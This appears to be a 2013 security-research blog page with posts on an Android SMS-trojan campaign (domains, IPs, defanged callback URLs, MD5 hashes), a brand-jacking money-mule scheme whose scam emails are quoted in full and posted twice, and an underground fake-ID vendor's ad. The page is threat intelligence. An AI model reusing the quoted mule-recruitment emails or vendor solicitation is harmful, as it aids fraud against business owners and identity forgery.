Rogue iFrame Injected Web Sites Lead to the AndroidOS/FakeInst/Trojan-SMS.J2ME.JiFake Mobile Malware

September 16, 2013

A currently ongoing malicious campaign relying on injected iFrames at legitimate Web sites, successfully segments mobile traffic, and exposes mobile users to fraudulent legitimately looking variants of the AndroidOS/FakeInst/Trojan-SMS.J2ME.JiFake mobile malware.

Let's dissect the campaign, expose the domains portfolio currently/historically known to have been involved in this campaign, as well as list all the malicious MD5s known to have been pushed by it.

iFrame injected domains containing the mobile traffic segmentation script parked on the same IP:
asphalt7-android.org - 93.170.109.193
fifa12-android.org
gta3-android.org
fruit-ninja-android.org
wildblood-android.org
osmos-android.org
moderncombat-android.org
minecraft-android.org
googlanalytics.ws
getinternet.ws
ddlloads.com
googlecount.ws
opera-com.com
opgrade.ws
statuses.ws
ya-googl.ws
yadirect.ws
yandex-google.ws



Sample mobile malware MD5s pushed by the campaign:
MD5: e77f3bffe18fb9f5a1b1e5e6a0b8aaf8
MD5: 5fb4cc0b0d8dfe8011c44f97c6dd0aa2
MD5: 9348b5a13278cc101ae95cb2a88fe403
MD5: f4966c315dafa7e39ad78e31e599e8d0
MD5: 6f839dd29d2c7807043d06ba19e9c916
MD5: 8cfebfa7175e6e9a10e2a9ade4d87405
MD5: 4e5af55dd6a310bced83eb08c9a635b3

Phone back location: hxxp://depositmobi.com/getTask.php/task=updateOpening&s= - 93.170.107.130

Parked on the same IP (93.170.107.130) are also the following domains participating in the campaign's infrastructure:
123diskapp.com
1gameminecraft.ru
2010mobile.ru
absex.ru
ammla.info
and4mobiles.ru
android-apk-file.ru
android-games-skachat.ru.com
android-key.ru
android-market-apk.ru
android-market-cools.ru
android-vk.com
android7s.ru
androidcool.tk
androiderus.com
androidnns.ru
androidone.net
androidperfomance.com
androids-market.ru
androidupos.ru
24-android.ru
online-android.ru
moiandroid.ru
ktozdesj.ru
super-androids.ru

The following malicious mobile malware MD5s are known to have phoned back to the same IP in the past:
MD5: 572b07bd031649d4a82bb392156b25c6
MD5: 9685ff439e610fa8f874bf216fa47eee
MD5: 6d9dd3c9671d3d88f16071f1483faa12
MD5: 276b77b3242cb0f767bfba0009bcf3e7
MD5: aefdbdee7f873441b9d53500e1af34fa

What's also worth emphasizing on is that we've also got a decent number of malicious Windows samples known to have phoned back to the same IP in the past, presumably in an attempt by fellow cybercriminals to monetize the traffic through an affiliate program.
MD5: bac8f2c5d0583ee8477d79dc52414bf5
MD5: a1ae35eadf7599d2f661a9ca7f0f2150
MD5: 419fdb78356eaf61f9445cf828b3e5cf
MD5: abce96eaa7c345c2c3a89a8307524001
MD5: 93d11dc11cccc5ac5a1d57edce73ea07
MD5: 53bbad9018cd53d16fb1a21bd4738619
MD5: 15f3eca26f6c8d12969ffb1dbeead236
MD5: 72c6c14f9bab8ff95dbaf491f2a2aff6
MD5: a282b40d654fee59a586b89a1a12cac2
MD5: e0798c635d263f15ab54a839bf6bac7f
MD5: 7b1d8820cc012deac282fc72471310bd
MD5: 21fdbb9e9e13297ae12768764e169fb4
MD5: 47fa4a3a7d94dad9fac1cbdc07862496
MD5: 5e9321027c73175cf6ff862019c90af7
MD5: cfbaccc61dc51b805673000d09e99024
MD5: 8bc4dd1aff76fd4d2513af4538626033
MD5: f6a622f76b18d3fa431a34eb33be4619
MD5: c068d11293fc14bebdf3b3827e0006ac
MD5: d68338a37f62e26e701dfe45a2f9cbf2
MD5: e1c9562b6666d9915c7748c25376416f
MD5: 1dccd14b23698ecc7c5a4b9099954ae4
MD5: 47601e9f8b624464b63d499af60f6c18

Actual download location of a sample mobile malware sample:
hxxp://mediaworks3.com/getfile.php?dtype=dle&u=getfl&d=FLVPLayer - 78.140.131.124


The following mobile malware serving domains are also known to have responded to the same IP (78.140.131.124) in the past:
4apkser.ru
absex.ru
agw-railway.com
androedis.ru
android-apk-file.ru
android-update.name
android6s.ru
android7s.ru
androidappfile.name
androidaps.ru
androidbizarre.com
androidilve.ru
androidovnloads.com
androidupss.ru
apk-load.ru
apkzona.ru
bali-special.ru
com-opera.com
dml-site.ru
download-opera.com

As well as the following malicious MD5s:
MD5: 8cfebfa7175e6e9a10e2a9ade4d87405
MD5: 4e5af55dd6a310bced83eb08c9a635b3

Thanks to the commercial availability of DIY iFrame injecting platforms, the current commoditization of hacked/compromised accounts across multiple verticals, the efficiency-oriented mass SQL injection campaigns, as well as the existence of beneath the radar malvertising campaigns, cybercriminals are perfectly positioned to continue monetizing mobile traffic for fraudulent/malicious purposes.

Updates will be posted as soon as new developments take place. Continue reading →

Summarizing Webroot's Threat Blog Posts for August

0
August 30, 2013

The following is a brief summary of all of my posts at Webroot's Threat Blog for August, 2013. You can subscribe to Webroot's Threat Blog RSS Feed, or follow me on Twitter:


01. ‘Malware-infected hosts as stepping stones’ service offers access to hundreds of compromised U.S based hosts
02. New ‘Hacked shells as a service’ empowers cybercriminals with access to high page rank-ed Web sites
03. Fake ‘iPhone Picture Snapshot Message’ themed emails lead to malware
04. Malicious Bank of America (BofA) ‘Statement of Expenses’ themed emails lead to client-side exploits and malware
05. Cybercriminals spamvertise fake ‘O2 U.K MMS’ themed emails, serve malware
06. One-stop-shop for spammers offers DKIM-verified SMTP servers, harvested email databases and training to potential customers
07. Fake ‘Apple Store Gift Card’ themed emails serve client-side exploits and malware
08. Newly launched managed ‘malware dropping’ service spotted in the wild
09. Cybercrime-friendly underground traffic exchange helps facilitate fraudulent and malicious activity
10. From Vietnam with tens of millions of harvested emails, spam-ready SMTP servers and DIY spamming tools
11. DIY Craigslist email collecting tools empower spammers with access to fresh/valid email addresses
12. Bulletproof TDS/Doorways/Pharma/Spam/Warez hosting service operates in the open since 2009
13. DIY automatic cybercrime-friendly ‘redirectors generating’ service spotted in the wild
14. Cybercriminals offer spam-ready SMTP servers for rent/direct managed purchase
15. Cybercrime-friendly underground traffic exchanges help facilitate fraudulent and malicious activity – part two

This post has been reproduced from Dancho Danchev's blog. Follow him on Twitter. Continue reading →

Profiling a Novel, High Profit Margins Oriented, Legitimate Companies Brand-Jacking Money Mule Recruitment Scheme

0
August 29, 2013
Over the years, I've been actively researching the money mule recruitment epidemic, providing actionable (real-time/historical) intelligence on their activities, exposing their DNS infrastructure, offering exclusive peek inside the Administration Panels utilized by money mules, emphasizing on current and emerging tactics applied by the individuals orchestrating the final stages of a fraudulent operation - the cash out process through basic risk-forwarding.

Catch up with previous research on the money mule recruitment problem:
In this post, I'll profile a novel money mule recruitment scheme, that involves high profit margins -- of course for the ones organizing the scheme -- through a direct, and most importantly, (pseudo) legal brand-jacking of a gullible business owner's brand name, enticing him/her into opening a merchant account for processing E-commerce transactions, coming from more gullible and socially engineered mules.

It all begins with an email coming from a non-existent "environmental enterprise", that in this particular case is abusing Google's brand in an attempt to increase the probability of a successful interaction with the socially engineered business owners:

Sample email:
Environmental enterprise searching for representation internationally
5% commission on 200K cash flow originated from promotion and sales of proprietary research articles

Necessary conditions:
- Own a company - Be reachable on daily basis through E-mail, phone or Skype - Proper execution of all planned undertakings

In case if being interested, please provide:
-  Name and Surname - Age - Telephone number (including country code) - City and Country - Email

Please answer to: NAME@googleapp-consult.com

Faithfully yours,
HR dept

Those who reply are kindly asked to open a merchant bank account using their own company data, and assured that, despite the fact that the Web site which will be selling the bogus 'research articles' will be using their (legitimate) business brand's name and contact details, they will still receive their 5% commission on a 200,000/250,000 EUR in anticipated revenue, which would naturally be coming directly from other mules participating in the fraudulent scheme. Moreover, despite that a business owner will have his company brand, logo, contact information listed at the Web site, he/she will have zero visibility to the non-existent purchasing process of this research, as "all customer service, sales, technical logistics, etc. are to be handled by us."

Why would a potential cybercrime syndicate want a socially engineered business owner to open a merchant bank account using his/her own data? Pretty simple. In my previous research on the standardization of the money mule recruitment process, I emphasized on how money mules are often vetted through online-based surveys, which always ask important from a mule recruiter's perspective question, such as - when did you you first open your bank account, and do you have any limitations on incoming/ongoing monetary transactions on it?

However, an established company would always benefit from the trust it has already established with its financial institution/service of choice, meaning that, it will not only get its merchant account open, but also, will successfully pass the majority of verification protection mechanisms for high volume transactions put into the place by the financial institution/service in place.

Sample reply email:
Thank you for your reply.

We are a company involved in development, branding and launching of several web media and IT projects involved in consulting on green technology, renewables and alternative energy sources. Several of the projects are being currently launched online and each one will need to have a card payment interface. This collaboration refers to opening a merchant account for online credit card acceptance (E-commerce).

We would need your company to open a merchant account for card acceptance and handle the receivables derived from the sales generated by each project. A bank/payment provider will facilitate data needed for website integration with their E-commerce payment gateway. We will handle the technical side of such integration in full.

We will brand the website under your company, therefore the administrative company data listed on the website will be yours, but all customer service, technical logistics and sales are to be handled by us. The products sold will be proprietary research articles and information packages on green technology, renewables and alternative energy sources.

Incoming proceedings from sales will be settled by the bank (or the payment provider) into your business bank account on a time scale defined by the bank (or the payment provider).
These sale proceedings will be transferred to us, minus your commission and expenses incurred. The volume of monthly payments processed through the merchant account will be in the order of EUR 200,000 - EUR 250,000 per month in the initial months. The expected rise is roughly 5-6% every month. The commission proposed to you stands at 5% of the mentioned volume.

All the expenses related to the operation including the banking and transactions fees and the merchant account setup and related fees are to be covered by us. If you agree in principle, I will provide the contract draft to define the legal terms of our collaboration.
 
Yours sincerely,

Michael Torti
General Manager
ECOFIN Projects (Gibraltar)
Tel/Fax: +350 2006 1287

Who are ECOFIN Projects (ecofinservices.net - 50.63.220.106) ? Nothing more than a cybercrime-friendly "marketing agency" at its best.






Sample About Us description:
Ecofin is offering outstanding solutions which are useful in maximizing revenues that are generated through a wide range of investment sectors and global assets. A wide range of services and financial opportunities are being offered for manufacturers, developers, owners as well as financial investors interested in our niche investment portfolios and services.

We are operating as a globally safe company as well as involving risk and integrity management expertise that brings together practical experience along with cutting edge, innovative engineering and technologies. The company is research based which is primarily focused on environmental sectors, alternative energy, infrastructure, as well as utility all around the globe.

The firm is practicing a fundamental and basic approach while it comes to managing its clientele assets. Ecofin is useful in developing, branding as well as launching exclusive information sales podiums based on alternative, as well as green technological sources along with IT and web media themes. The company is dedicated to providing its clients with the highest levels of quality services and investment returns within the niche industries that we focus upon.

Contact details:
+350 200 67911 (Gibraltar)
+852 5808 2461 (Hong Kong)
+54 11 5984 1154 (Buenos Aires)
+44 20 3051 6249 (London)
Skype: ecofin2013
Suite 4, 209 Main Street
Gibraltar GBZ 1AA

A potentially socially engineered business owner would then be contacted with a similar email:
Please find the Contract draft attached, review and confirm your agreement with every point of it. The next step would be to provide the proper company data to be put in the contract and produce the final version for the signing.

Please review the showcase website:

This site will be copied into a new domain reflecting your company name and your company data.
As indicated, all customer service, sales, technical logistics, etc. are to be handled by us. You would need to open a merchant account for online credit card acceptance (E-commerce).

The customers will be from all over the world. All the issues related to sales, marketing, customer service, supply, logistics, etc. are to be handled by us. You will be required to open a merchant account for online credit card acceptance, receive the funds and transfer us the proceedings, as indicated in the contract draft with detail. No capital or any upfront payments from your side are required. If it is necessary to cover any upfront fees for the merchant account establishment, we will transfer such fees to you beforehand.

Sample Web Site Template offered as an example of how a socially engineered business owner's company branded Web site, would look like (greentechidea.com - 50.63.39.1):




Sample copy of the Contract:







Sample domains from the mule recruitment campaigns spamvertised over email:
googleapp-consult.com
googleapps-euro.com
worlds-trade.com
trades-consult.com
worlds-diploms.com

Sample name servers involved in the campaign:
NS1.ELCACAREO.NET - 184.82.62.16; 136.0.16.169; 184.82.204.70 - Email: shanghaiherald32@yahoo.com
NS2.ELCACAREO.NET - 6.87.78.121

The same email (shanghaiherald32@yahoo.com) is also known to have also been used to register the following fraudulent/malicious domains:
badstylecorps.com
tvblips.net
viperlair.net

"The only green is money".

This post has been reproduced from Dancho Danchev's blog. Follow him on Twitter. Continue reading →

Profiling a Novel, High Profit Margins Oriented, Legitimate Companies Brand-Jacking Money Mule Recruitment Scheme

August 29, 2013
Over the years, I've been actively researching the money mule recruitment epidemic, providing actionable (real-time/historical) intelligence on their activities, exposing their DNS infrastructure, offering exclusive peek inside the Administration Panels utilized by money mules, emphasizing on current and emerging tactics applied by the individuals orchestrating the final stages of a fraudulent operation - the cash out process through basic risk-forwarding.

Catch up with previous research on the money mule recruitment problem:
In this post, I'll profile a novel money mule recruitment scheme, that involves high profit margins -- of course for the ones organizing the scheme -- through a direct, and most importantly, (pseudo) legal brand-jacking of a gullible business owner's brand name, enticing him/her into opening a merchant account for processing E-commerce transactions, coming from more gullible and socially engineered mules.

It all begins with an email coming from a non-existent "environmental enterprise", that in this particular case is abusing Google's brand in an attempt to increase the probability of a successful interaction with the socially engineered business owners:

Sample email:
Environmental enterprise searching for representation internationally
5% commission on 200K cash flow originated from promotion and sales of proprietary research articles

Necessary conditions:
- Own a company - Be reachable on daily basis through E-mail, phone or Skype - Proper execution of all planned undertakings

In case if being interested, please provide:
-  Name and Surname - Age - Telephone number (including country code) - City and Country - Email

Please answer to: NAME@googleapp-consult.com

Faithfully yours,
HR dept

Those who reply are kindly asked to open a merchant bank account using their own company data, and assured that, despite the fact that the Web site which will be selling the bogus 'research articles' will be using their (legitimate) business brand's name and contact details, they will still receive their 5% commission on a 200,000/250,000 EUR in anticipated revenue, which would naturally be coming directly from other mules participating in the fraudulent scheme. Moreover, despite that a business owner will have his company brand, logo, contact information listed at the Web site, he/she will have zero visibility to the non-existent purchasing process of this research, as "all customer service, sales, technical logistics, etc. are to be handled by us."

Why would a potential cybercrime syndicate want a socially engineered business owner to open a merchant bank account using his/her own data? Pretty simple. In my previous research on the standardization of the money mule recruitment process, I emphasized on how money mules are often vetted through online-based surveys, which always ask important from a mule recruiter's perspective question, such as - when did you you first open your bank account, and do you have any limitations on incoming/ongoing monetary transactions on it?

However, an established company would always benefit from the trust it has already established with its financial institution/service of choice, meaning that, it will not only get its merchant account open, but also, will successfully pass the majority of verification protection mechanisms for high volume transactions put into the place by the financial institution/service in place.

Sample reply email:
Thank you for your reply.

We are a company involved in development, branding and launching of several web media and IT projects involved in consulting on green technology, renewables and alternative energy sources. Several of the projects are being currently launched online and each one will need to have a card payment interface. This collaboration refers to opening a merchant account for online credit card acceptance (E-commerce).

We would need your company to open a merchant account for card acceptance and handle the receivables derived from the sales generated by each project. A bank/payment provider will facilitate data needed for website integration with their E-commerce payment gateway. We will handle the technical side of such integration in full.

We will brand the website under your company, therefore the administrative company data listed on the website will be yours, but all customer service, technical logistics and sales are to be handled by us. The products sold will be proprietary research articles and information packages on green technology, renewables and alternative energy sources.

Incoming proceedings from sales will be settled by the bank (or the payment provider) into your business bank account on a time scale defined by the bank (or the payment provider).
These sale proceedings will be transferred to us, minus your commission and expenses incurred. The volume of monthly payments processed through the merchant account will be in the order of EUR 200,000 - EUR 250,000 per month in the initial months. The expected rise is roughly 5-6% every month. The commission proposed to you stands at 5% of the mentioned volume.

All the expenses related to the operation including the banking and transactions fees and the merchant account setup and related fees are to be covered by us. If you agree in principle, I will provide the contract draft to define the legal terms of our collaboration.
 
Yours sincerely,

Michael Torti
General Manager
ECOFIN Projects (Gibraltar)
Tel/Fax: +350 2006 1287

Who are ECOFIN Projects (ecofinservices.net - 50.63.220.106) ? Nothing more than a cybercrime-friendly "marketing agency" at its best.






Sample About Us description:
Ecofin is offering outstanding solutions which are useful in maximizing revenues that are generated through a wide range of investment sectors and global assets. A wide range of services and financial opportunities are being offered for manufacturers, developers, owners as well as financial investors interested in our niche investment portfolios and services.

We are operating as a globally safe company as well as involving risk and integrity management expertise that brings together practical experience along with cutting edge, innovative engineering and technologies. The company is research based which is primarily focused on environmental sectors, alternative energy, infrastructure, as well as utility all around the globe.

The firm is practicing a fundamental and basic approach while it comes to managing its clientele assets. Ecofin is useful in developing, branding as well as launching exclusive information sales podiums based on alternative, as well as green technological sources along with IT and web media themes. The company is dedicated to providing its clients with the highest levels of quality services and investment returns within the niche industries that we focus upon.

Contact details:
+350 200 67911 (Gibraltar)
+852 5808 2461 (Hong Kong)
+54 11 5984 1154 (Buenos Aires)
+44 20 3051 6249 (London)
Skype: ecofin2013
Suite 4, 209 Main Street
Gibraltar GBZ 1AA

A potentially socially engineered business owner would then be contacted with a similar email:
Please find the Contract draft attached, review and confirm your agreement with every point of it. The next step would be to provide the proper company data to be put in the contract and produce the final version for the signing.

Please review the showcase website:

This site will be copied into a new domain reflecting your company name and your company data.
As indicated, all customer service, sales, technical logistics, etc. are to be handled by us. You would need to open a merchant account for online credit card acceptance (E-commerce).

The customers will be from all over the world. All the issues related to sales, marketing, customer service, supply, logistics, etc. are to be handled by us. You will be required to open a merchant account for online credit card acceptance, receive the funds and transfer us the proceedings, as indicated in the contract draft with detail. No capital or any upfront payments from your side are required. If it is necessary to cover any upfront fees for the merchant account establishment, we will transfer such fees to you beforehand.

Sample Web Site Template offered as an example of how a socially engineered business owner's company branded Web site, would look like (greentechidea.com - 50.63.39.1):




Sample copy of the Contract:







Sample domains from the mule recruitment campaigns spamvertised over email:
googleapp-consult.com
googleapps-euro.com
worlds-trade.com
trades-consult.com
worlds-diploms.com

Sample name servers involved in the campaign:
NS1.ELCACAREO.NET - 184.82.62.16; 136.0.16.169; 184.82.204.70 - Email: shanghaiherald32@yahoo.com
NS2.ELCACAREO.NET - 6.87.78.121

The same email (shanghaiherald32@yahoo.com) is also known to have also been used to register the following fraudulent/malicious domains:
badstylecorps.com
tvblips.net
viperlair.net

"The only green is money".

This post has been reproduced from Dancho Danchev's blog. Follow him on Twitter. Continue reading →

Cybercriminals Offer High Quality Plastic U.S Driving Licenses/University ID Cards

0
August 29, 2013
Continuing the series of blog posts profiling the most recent underground market propositions for high quality fake passports/IDs/documents, in this post, I'll emphasize on a cybercrime-friendly vendor that's exclusively targeting the U.S market.

Go through previous research into the market for fake passports/IDs/documents:
Offering fake plastic driving licenses for over 25+ U.S States, including student IDs for major U.S Universities for a static price of $150, the vendor not just currently outperforms competing vendors in terms of quality in this particular market segment -- within the cybercrime-friendly community in question -- but also, is already receiving recommendations from other cybercriminals to raise the price of his underground market 'asset', indicating penetration pricing in action.

Payment methods accepted? Bitcoin, Western Union and Moneygram.

Sample underground market ad:
[VENDOR's NAME REDACTED] has over 25+ states on tap, along with 'secondaries' to offer, all of of which and are high quality, meaning in-state without issue, in most cases. All IDs contain UV (where applicable as some states don't), multispec-hologram, 1D/2D barcode and/or magstripe that will scan/swipe to read DMV/AAMVA license standard.

The vendor is requiring the following data from his potential customers:
Name - First, MI, Last
Address
DOB
Sex
Hair Color
Height
Weight
Eye color
Driver License number - if a number isn't provided one will be randomly generated
Endorsements and/or Restrictions - if not included these will be left blank
Scanned signature - if not provided you will receive a generic font signature

*****More\Less info may be required depending on the state requested

Scanned passport picture - no webcam pictures can be accepted.

If you cannot get a real passport picture and have a decent camera, please take a pic from the chest up against a white background/drywall with the flash 'ON'. I will handle the cropping aspect. Also try to have good lighting and when scanning use high resolution. You may also upload a signature. I ask that this be written using a black sharpie style pen to achieve the best results.

You may upload this info to sendspace.com or the file-sharing site of your choosing and forward me the download link. I will confirm reception via email and you order will begin processing. All IDs are 150USD with incentive to group buys. Payment can be made via BTC, WU, Moneygram. Payment will be collected upon completion and approval of your order.

Sample screenshots of the service's current 'inventory':































































































































The market for fake passports/IDs/documents is prone to flourish, as more cybercriminals demand both, scanned, and plastic fake IDs to be later one abused in related fraudulent schemes. Naturally, the market is quick to supply, and those who excel in their Operational Security and quality of the underground market 'assets', will begin occupying a decent market share within this underground market segment.

This post has been reproduced from Dancho Danchev's blog. Follow him on Twitter. Continue reading →
Subscribe to: Comments (Atom)